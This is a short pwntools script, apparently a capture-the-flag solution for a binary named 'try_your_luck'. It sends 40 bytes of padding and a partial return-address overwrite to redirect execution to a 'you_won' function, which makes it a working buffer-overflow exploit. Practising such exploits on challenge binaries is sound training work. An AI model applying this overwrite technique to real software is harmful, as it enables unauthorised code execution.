```
#!/usr/bin/env python3

from pwn import *

exe = ELF("./try_your_luck")

context.binary = exe


def conn():
    if args.LOCAL:
        r = process([exe.path])
        #gdb.attach(r)
    else:
        r = remote("addr", 1337)

    return r


def main():
    r = conn()

    print(hex(exe.sym.you_won)) #0x83a

    OFFSET = 40
    GAME_OFFSET = 0xa47 #GAME and WON are in the same page (disass main + vmmap in GDB)
    WON_OFFSET = 0x83a 

    r.sendafter(b'name?', b'A'* OFFSET + p16(WON_OFFSET & 0xffff))

    r.interactive()


if __name__ == "__main__":
    main()

```
